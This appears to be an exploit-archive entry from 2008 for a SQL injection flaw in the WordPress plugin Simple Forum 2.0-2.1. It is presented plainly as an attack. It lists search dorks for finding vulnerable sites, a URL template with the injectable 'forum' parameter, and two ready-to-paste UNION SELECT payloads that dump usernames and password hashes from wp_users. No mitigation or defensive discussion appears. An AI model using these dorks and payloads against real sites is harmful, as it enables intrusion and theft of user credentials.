id: 2645
date: 02/15/2008
title: Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
=================================================================



###############################################################
#
# Simple Forum Version 2.0-2.1(sf-forum)
#
################################################################

DORKS 1 :

Simple Forum - Version 2.0 (Build 207)
Simple Forum - Surum 2.1 (Build 228)
Simple Forum - Version 2.1 (Build 236)

DORK 2 : allinurl: "sf-forum?forum"

################################################################
example :

http://www.xxx.com/sf-forum?forum=[exploit]

EXPLOIT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

exploit 2 :

-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*





#  0day.today [2023-03-23]  #